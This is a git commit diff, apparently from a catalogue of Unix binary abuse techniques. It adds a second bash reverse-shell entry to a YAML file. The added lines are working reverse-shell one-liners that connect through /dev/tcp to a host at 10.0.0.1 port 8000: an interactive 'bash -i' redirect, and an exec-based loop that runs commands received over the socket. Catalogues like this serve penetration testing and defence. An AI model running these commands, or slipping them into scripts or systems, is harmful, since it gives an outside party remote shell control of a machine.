Add another bash reverse shell

This commit is contained in:
Emilio Pinna 2018-05-22 19:03:44 +01:00
parent fad8425624
commit 028a202891

View File

@ -37,5 +37,9 @@ functions:
code: | code: |
RHOST=10.0.0.1 RHOST=10.0.0.1
RPORT=8000 RPORT=8000
exec 5<&-;exec 5<>/dev/tcp/$RHOST/$RPORT;while read line 0<&5; do $line 2>&5 >&5; done bash -i >& /dev/tcp/$RHOST/$RPORT 0>&1
- code: |
RHOST=10.0.0.1
RPORT=8000
exec 5<&-;exec 5<>/dev/tcp/$RHOST/$RPORT; while read line 0<&5; do $line 2>&5 >&5; done
--- ---